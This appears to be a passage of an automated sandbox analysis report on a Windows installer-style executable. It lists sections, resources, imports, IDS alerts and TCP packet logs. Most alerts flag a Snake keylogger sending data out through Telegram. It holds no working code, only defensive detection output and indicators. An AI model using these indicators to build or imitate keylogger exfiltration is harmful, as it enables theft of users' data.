.text	0x1000	0x6409	0x6600	bfe2b726d49cbd922b87bad5eea65e61	False	0.6540287990196079	data	6.416186322230332	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x1396	0x1400	d45dcba8ca646543f7e339e20089687e	False	0.45234375	data	5.154907432640367	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x20358	0x600	8575fc5e872ca789611c386779287649	False	0.5026041666666666	data	4.004402321344153	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x2b000	0x2a000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x55000	0x21068	0x21200	03ed2ed76ba15352dac9e48819696134	False	0.8714696344339623	data	7.556190648348207	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_BITMAP	0x554c0	0x368	Device independent bitmap graphic, 96 x 16 x 4, image size 768	English	United States	0.23623853211009174
RT_ICON	0x55828	0xc2a3	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9966684729162903
RT_ICON	0x61ad0	0x86e0	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.990210843373494
RT_ICON	0x6a1b0	0x5085	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9867559307233299
RT_ICON	0x6f238	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.4358921161825726
RT_ICON	0x717e0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.4896810506566604
RT_ICON	0x72888	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	English	United States	0.5367803837953091
RT_ICON	0x73730	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	United States	0.6913357400722022
RT_ICON	0x73fd8	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1152	English	United States	0.38597560975609757
RT_ICON	0x74640	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	United States	0.4934971098265896
RT_ICON	0x74ba8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.651595744680851
RT_ICON	0x75010	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512	English	United States	0.46908602150537637
RT_ICON	0x752f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128	English	United States	0.5472972972972973
RT_DIALOG	0x75420	0x120	data	English	United States	0.53125
RT_DIALOG	0x75540	0x118	data	English	United States	0.5678571428571428
RT_DIALOG	0x75658	0x120	data	English	United States	0.5104166666666666
RT_DIALOG	0x75778	0xf8	data	English	United States	0.6330645161290323
RT_DIALOG	0x75870	0xa0	data	English	United States	0.6125
RT_DIALOG	0x75910	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x75970	0xae	data	English	United States	0.6091954022988506
RT_VERSION	0x75a20	0x308	data	English	United States	0.47036082474226804
RT_MANIFEST	0x75d28	0x33e	XML 1.0 document, ASCII text, with very long lines (830), with no line terminators	English	United States	0.5542168674698795

Imports

DLL	Import
KERNEL32.dll	ExitProcess, SetFileAttributesW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, SetCurrentDirectoryW, GetFileAttributesW, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, CopyFileW, GetShortPathNameW, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalUnlock, GetDiskFreeSpaceW, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
USER32.dll	GetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
ADVAPI32.dll	AdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-10T22:31:28.793002+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.3	49957	172.217.16.206	443	TCP
2025-01-10T22:31:34.578497+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.3	49979	132.226.247.73	80	TCP
2025-01-10T22:31:41.875333+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.3	49979	132.226.247.73	80	TCP
2025-01-10T22:31:42.502681+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.3	49981	149.154.167.220	443	TCP
2025-01-10T22:31:42.795136+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.3	49981	149.154.167.220	443	TCP
2025-01-10T22:31:43.734718+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.3	49982	132.226.247.73	80	TCP
2025-01-10T22:31:44.296888+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.3	49983	149.154.167.220	443	TCP
2025-01-10T22:31:44.660547+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.3	49983	149.154.167.220	443	TCP
2025-01-10T22:31:46.023661+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.3	49986	149.154.167.220	443	TCP
2025-01-10T22:31:46.373821+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.3	49986	149.154.167.220	443	TCP
2025-01-10T22:31:47.725131+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.3	49988	149.154.167.220	443	TCP
2025-01-10T22:31:48.072800+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.3	49988	149.154.167.220	443	TCP
2025-01-10T22:31:49.422005+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.3	49990	149.154.167.220	443	TCP
2025-01-10T22:31:49.912050+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.3	49990	149.154.167.220	443	TCP
2025-01-10T22:31:51.226907+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.3	49992	149.154.167.220	443	TCP
2025-01-10T22:31:51.599034+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.3	49992	149.154.167.220	443	TCP
2025-01-10T22:31:52.992362+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.3	49994	149.154.167.220	443	TCP
2025-01-10T22:31:53.232416+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.3	49994	149.154.167.220	443	TCP
2025-01-10T22:31:54.576520+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.3	49996	149.154.167.220	443	TCP
2025-01-10T22:31:54.979558+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.3	49996	149.154.167.220	443	TCP
2025-01-10T22:31:56.344110+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.3	49998	149.154.167.220	443	TCP
2025-01-10T22:31:56.646913+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.3	49998	149.154.167.220	443	TCP
2025-01-10T22:31:58.069972+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.3	50000	149.154.167.220	443	TCP
2025-01-10T22:31:58.500953+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.3	50000	149.154.167.220	443	TCP
2025-01-10T22:31:59.844867+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.3	50002	149.154.167.220	443	TCP
2025-01-10T22:32:00.211457+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.3	50002	149.154.167.220	443	TCP
2025-01-10T22:32:01.560579+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.3	50004	149.154.167.220	443	TCP
2025-01-10T22:32:02.065451+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.3	50004	149.154.167.220	443	TCP
2025-01-10T22:32:03.401380+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.3	50006	149.154.167.220	443	TCP
2025-01-10T22:32:03.695686+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.3	50006	149.154.167.220	443	TCP
2025-01-10T22:32:05.014421+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.3	50008	149.154.167.220	443	TCP
2025-01-10T22:32:05.323955+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.3	50008	149.154.167.220	443	TCP
2025-01-10T22:32:06.626429+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.3	50010	149.154.167.220	443	TCP
2025-01-10T22:32:06.842799+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.3	50010	149.154.167.220	443	TCP
2025-01-10T22:32:08.187001+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.3	50012	149.154.167.220	443	TCP
2025-01-10T22:32:08.522045+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.3	50012	149.154.167.220	443	TCP
2025-01-10T22:32:09.814826+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.3	50014	149.154.167.220	443	TCP
2025-01-10T22:32:10.028089+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.3	50014	149.154.167.220	443	TCP
2025-01-10T22:32:11.486908+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.3	50016	149.154.167.220	443	TCP
2025-01-10T22:32:11.703832+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.3	50016	149.154.167.220	443	TCP
2025-01-10T22:32:13.012727+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.3	50018	149.154.167.220	443	TCP
2025-01-10T22:32:13.305255+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.3	50018	149.154.167.220	443	TCP
2025-01-10T22:32:14.625484+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.3	50020	149.154.167.220	443	TCP
2025-01-10T22:32:14.921617+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.3	50020	149.154.167.220	443	TCP
2025-01-10T22:32:16.250162+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.3	50022	149.154.167.220	443	TCP
2025-01-10T22:32:16.558067+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.3	50022	149.154.167.220	443	TCP
2025-01-10T22:32:17.871356+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.3	50024	149.154.167.220	443	TCP
2025-01-10T22:32:18.201123+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.3	50024	149.154.167.220	443	TCP
2025-01-10T22:32:19.521958+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.3	50026	149.154.167.220	443	TCP
2025-01-10T22:32:20.147674+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.3	50026	149.154.167.220	443	TCP
2025-01-10T22:32:21.566377+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.3	50028	149.154.167.220	443	TCP
2025-01-10T22:32:21.894411+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.3	50028	149.154.167.220	443	TCP
2025-01-10T22:32:23.239141+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.3	50030	149.154.167.220	443	TCP
2025-01-10T22:32:23.550116+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.3	50030	149.154.167.220	443	TCP
2025-01-10T22:32:24.930723+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.3	50032	149.154.167.220	443	TCP
2025-01-10T22:32:25.157811+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.3	50032	149.154.167.220	443	TCP
2025-01-10T22:32:26.485485+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.3	50034	149.154.167.220	443	TCP
2025-01-10T22:32:26.822595+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.3	50034	149.154.167.220	443	TCP
2025-01-10T22:32:28.148054+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.3	50036	149.154.167.220	443	TCP
2025-01-10T22:32:28.441661+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.3	50036	149.154.167.220	443	TCP
2025-01-10T22:32:29.807757+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.3	50038	149.154.167.220	443	TCP
2025-01-10T22:32:30.103458+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.3	50038	149.154.167.220	443	TCP
2025-01-10T22:32:31.428691+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.3	50040	149.154.167.220	443	TCP
2025-01-10T22:32:31.717161+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.3	50040	149.154.167.220	443	TCP
2025-01-10T22:32:33.080521+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.3	50042	149.154.167.220	443	TCP
2025-01-10T22:32:33.368274+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.3	50042	149.154.167.220	443	TCP
2025-01-10T22:32:34.684760+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.3	50044	149.154.167.220	443	TCP
2025-01-10T22:32:34.949518+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.3	50044	149.154.167.220	443	TCP
2025-01-10T22:32:36.272050+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.3	50046	149.154.167.220	443	TCP
2025-01-10T22:32:36.635993+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.3	50046	149.154.167.220	443	TCP
2025-01-10T22:32:37.963363+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.3	50048	149.154.167.220	443	TCP
2025-01-10T22:32:38.396117+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.3	50048	149.154.167.220	443	TCP
2025-01-10T22:32:39.727964+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.3	50050	149.154.167.220	443	TCP
2025-01-10T22:32:40.009407+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.3	50050	149.154.167.220	443	TCP
2025-01-10T22:32:41.335109+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.3	50052	149.154.167.220	443	TCP
2025-01-10T22:32:41.690988+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.3	50052	149.154.167.220	443	TCP
2025-01-10T22:32:43.019779+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.3	50054	149.154.167.220	443	TCP
2025-01-10T22:32:43.422528+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.3	50054	149.154.167.220	443	TCP
2025-01-10T22:32:44.755265+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.3	50056	149.154.167.220	443	TCP
2025-01-10T22:32:45.173689+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.3	50056	149.154.167.220	443	TCP
2025-01-10T22:32:46.491451+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.3	50058	149.154.167.220	443	TCP
2025-01-10T22:32:46.910708+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.3	50058	149.154.167.220	443	TCP
2025-01-10T22:32:48.273116+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.3	50060	149.154.167.220	443	TCP
2025-01-10T22:32:48.558073+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.3	50060	149.154.167.220	443	TCP
2025-01-10T22:32:49.876435+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.3	50062	149.154.167.220	443	TCP
2025-01-10T22:32:50.365152+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.3	50062	149.154.167.220	443	TCP
2025-01-10T22:32:51.682684+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.3	50064	149.154.167.220	443	TCP
2025-01-10T22:32:52.063956+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.3	50064	149.154.167.220	443	TCP
2025-01-10T22:32:53.379112+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.3	50066	149.154.167.220	443	TCP
2025-01-10T22:32:53.608952+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.3	50066	149.154.167.220	443	TCP
2025-01-10T22:32:54.999588+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.3	50068	149.154.167.220	443	TCP
2025-01-10T22:32:55.407874+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.3	50068	149.154.167.220	443	TCP
2025-01-10T22:32:56.736013+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.3	50070	149.154.167.220	443	TCP
2025-01-10T22:32:57.073739+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.3	50070	149.154.167.220	443	TCP
2025-01-10T22:33:01.011858+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.3	50072	149.154.167.220	443	TCP
2025-01-10T22:33:01.419984+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.3	50072	149.154.167.220	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 22:31:27.733100891 CET	49957	443	192.168.2.3	172.217.16.206
Jan 10, 2025 22:31:27.733155012 CET	443	49957	172.217.16.206	192.168.2.3
Jan 10, 2025 22:31:27.733726978 CET	49957	443	192.168.2.3	172.217.16.206
Jan 10, 2025 22:31:27.749548912 CET	49957	443	192.168.2.3	172.217.16.206
Jan 10, 2025 22:31:27.749588013 CET	443	49957	172.217.16.206	192.168.2.3
Jan 10, 2025 22:31:28.407051086 CET	443	49957	172.217.16.206	192.168.2.3
Jan 10, 2025 22:31:28.407134056 CET	49957	443	192.168.2.3	172.217.16.206
Jan 10, 2025 22:31:28.408039093 CET	443	49957	172.217.16.206	192.168.2.3
Jan 10, 2025 22:31:28.408107042 CET	49957	443	192.168.2.3	172.217.16.206
Jan 10, 2025 22:31:28.470081091 CET	49957	443	192.168.2.3	172.217.16.206
Jan 10, 2025 22:31:28.470102072 CET	443	49957	172.217.16.206	192.168.2.3
Jan 10, 2025 22:31:28.470472097 CET	443	49957	172.217.16.206	192.168.2.3
Jan 10, 2025 22:31:28.470566034 CET	49957	443	192.168.2.3	172.217.16.206
Jan 10, 2025 22:31:28.475205898 CET	49957	443	192.168.2.3	172.217.16.206
Jan 10, 2025 22:31:28.515347004 CET	443	49957	172.217.16.206	192.168.2.3
Jan 10, 2025 22:31:28.793009996 CET	443	49957	172.217.16.206	192.168.2.3
Jan 10, 2025 22:31:28.793067932 CET	49957	443	192.168.2.3	172.217.16.206
Jan 10, 2025 22:31:28.793086052 CET	443	49957	172.217.16.206	192.168.2.3
Jan 10, 2025 22:31:28.793123960 CET	49957	443	192.168.2.3	172.217.16.206
Jan 10, 2025 22:31:28.793246984 CET	49957	443	192.168.2.3	172.217.16.206
Jan 10, 2025 22:31:28.793289900 CET	443	49957	172.217.16.206	192.168.2.3
Jan 10, 2025 22:31:28.793346882 CET	49957	443	192.168.2.3	172.217.16.206
Jan 10, 2025 22:31:28.819082975 CET	49963	443	192.168.2.3	172.217.16.129
Jan 10, 2025 22:31:28.819118023 CET	443	49963	172.217.16.129	192.168.2.3
Jan 10, 2025 22:31:28.819195986 CET	49963	443	192.168.2.3	172.217.16.129
Jan 10, 2025 22:31:28.819428921 CET	49963	443	192.168.2.3	172.217.16.129
Jan 10, 2025 22:31:28.819442987 CET	443	49963	172.217.16.129	192.168.2.3
Jan 10, 2025 22:31:29.487622976 CET	443	49963	172.217.16.129	192.168.2.3
Jan 10, 2025 22:31:29.487720966 CET	49963	443	192.168.2.3	172.217.16.129
Jan 10, 2025 22:31:29.491384029 CET	49963	443	192.168.2.3	172.217.16.129
Jan 10, 2025 22:31:29.491391897 CET	443	49963	172.217.16.129	192.168.2.3
Jan 10, 2025 22:31:29.491664886 CET	443	49963	172.217.16.129	192.168.2.3
Jan 10, 2025 22:31:29.491725922 CET	49963	443	192.168.2.3	172.217.16.129
Jan 10, 2025 22:31:29.492027998 CET	49963	443	192.168.2.3	172.217.16.129
Jan 10, 2025 22:31:29.535336018 CET	443	49963	172.217.16.129	192.168.2.3
Jan 10, 2025 22:31:32.344125032 CET	443	49963	172.217.16.129	192.168.2.3
Jan 10, 2025 22:31:32.344214916 CET	49963	443	192.168.2.3	172.217.16.129
Jan 10, 2025 22:31:32.350044012 CET	443	49963	172.217.16.129	192.168.2.3
Jan 10, 2025 22:31:32.350117922 CET	49963	443	192.168.2.3	172.217.16.129
Jan 10, 2025 22:31:32.355257034 CET	443	49963	172.217.16.129	192.168.2.3
Jan 10, 2025 22:31:32.355323076 CET	49963	443	192.168.2.3	172.217.16.129
Jan 10, 2025 22:31:32.355335951 CET	443	49963	172.217.16.129	192.168.2.3
Jan 10, 2025 22:31:32.355403900 CET	49963	443	192.168.2.3	172.217.16.129
Jan 10, 2025 22:31:32.357608080 CET	443	49963	172.217.16.129	192.168.2.3
Jan 10, 2025 22:31:32.357657909 CET	49963	443	192.168.2.3	172.217.16.129
Jan 10, 2025 22:31:32.434617996 CET	443	49963	172.217.16.129	192.168.2.3
Jan 10, 2025 22:31:32.434693098 CET	49963	443	192.168.2.3	172.217.16.129
Jan 10, 2025 22:31:32.434720039 CET	443	49963	172.217.16.129	192.168.2.3
Jan 10, 2025 22:31:32.434756994 CET	443	49963	172.217.16.129	192.168.2.3
Jan 10, 2025 22:31:32.434761047 CET	49963	443	192.168.2.3	172.217.16.129
Jan 10, 2025 22:31:32.434770107 CET	443	49963	172.217.16.129	192.168.2.3
Jan 10, 2025 22:31:32.434794903 CET	49963	443	192.168.2.3	172.217.16.129
Jan 10, 2025 22:31:32.434823036 CET	49963	443	192.168.2.3	172.217.16.129
Jan 10, 2025 22:31:32.434827089 CET	443	49963	172.217.16.129	192.168.2.3
Jan 10, 2025 22:31:32.434864044 CET	49963	443	192.168.2.3	172.217.16.129
Jan 10, 2025 22:31:32.439841986 CET	443	49963	172.217.16.129	192.168.2.3
Jan 10, 2025 22:31:32.439939022 CET	49963	443	192.168.2.3	172.217.16.129
Jan 10, 2025 22:31:32.439944983 CET	443	49963	172.217.16.129	192.168.2.3
Jan 10, 2025 22:31:32.439996958 CET	49963	443	192.168.2.3	172.217.16.129
Jan 10, 2025 22:31:32.446187019 CET	443	49963	172.217.16.129	192.168.2.3
Jan 10, 2025 22:31:32.446242094 CET	49963	443	192.168.2.3	172.217.16.129
Jan 10, 2025 22:31:32.446250916 CET	443	49963	172.217.16.129	192.168.2.3
Jan 10, 2025 22:31:32.446286917 CET	49963	443	192.168.2.3	172.217.16.129
Jan 10, 2025 22:31:32.452475071 CET	443	49963	172.217.16.129	192.168.2.3
Jan 10, 2025 22:31:32.452518940 CET	49963	443	192.168.2.3	172.217.16.129
Jan 10, 2025 22:31:32.452611923 CET	443	49963	172.217.16.129	192.168.2.3
Jan 10, 2025 22:31:32.452651978 CET	49963	443	192.168.2.3	172.217.16.129
Jan 10, 2025 22:31:32.458889008 CET	443	49963	172.217.16.129	192.168.2.3
Jan 10, 2025 22:31:32.458940983 CET	49963	443	192.168.2.3	172.217.16.129
Jan 10, 2025 22:31:32.458950043 CET	443	49963	172.217.16.129	192.168.2.3
Jan 10, 2025 22:31:32.459022045 CET	49963	443	192.168.2.3	172.217.16.129
Jan 10, 2025 22:31:32.476506948 CET	443	49963	172.217.16.129	192.168.2.3
Jan 10, 2025 22:31:32.476563931 CET	443	49963	172.217.16.129	192.168.2.3
Jan 10, 2025 22:31:32.476598024 CET	443	49963	172.217.16.129	192.168.2.3
Jan 10, 2025 22:31:32.476636887 CET	49963	443	192.168.2.3	172.217.16.129
Jan 10, 2025 22:31:32.476658106 CET	443	49963	172.217.16.129	192.168.2.3
Jan 10, 2025 22:31:32.476672888 CET	49963	443	192.168.2.3	172.217.16.129
Jan 10, 2025 22:31:32.477804899 CET	443	49963	172.217.16.129	192.168.2.3
Jan 10, 2025 22:31:32.477854967 CET	49963	443	192.168.2.3	172.217.16.129
Jan 10, 2025 22:31:32.477861881 CET	443	49963	172.217.16.129	192.168.2.3
Jan 10, 2025 22:31:32.477901936 CET	49963	443	192.168.2.3	172.217.16.129
Jan 10, 2025 22:31:32.482511044 CET	443	49963	172.217.16.129	192.168.2.3
Jan 10, 2025 22:31:32.482559919 CET	49963	443	192.168.2.3	172.217.16.129
Jan 10, 2025 22:31:32.482566118 CET	443	49963	172.217.16.129	192.168.2.3
Jan 10, 2025 22:31:32.482603073 CET	49963	443	192.168.2.3	172.217.16.129
Jan 10, 2025 22:31:32.488460064 CET	443	49963	172.217.16.129	192.168.2.3
Jan 10, 2025 22:31:32.488511086 CET	49963	443	192.168.2.3	172.217.16.129
Jan 10, 2025 22:31:32.488517046 CET	443	49963	172.217.16.129	192.168.2.3
Jan 10, 2025 22:31:32.488681078 CET	49963	443	192.168.2.3	172.217.16.129
Jan 10, 2025 22:31:32.494421959 CET	443	49963	172.217.16.129	192.168.2.3
Jan 10, 2025 22:31:32.494484901 CET	49963	443	192.168.2.3	172.217.16.129
Jan 10, 2025 22:31:32.494492054 CET	443	49963	172.217.16.129	192.168.2.3
Jan 10, 2025 22:31:32.494524956 CET	49963	443	192.168.2.3	172.217.16.129
Jan 10, 2025 22:31:32.500489950 CET	443	49963	172.217.16.129	192.168.2.3
Jan 10, 2025 22:31:32.500576973 CET	49963	443	192.168.2.3	172.217.16.129
Jan 10, 2025 22:31:32.525281906 CET	443	49963	172.217.16.129	192.168.2.3
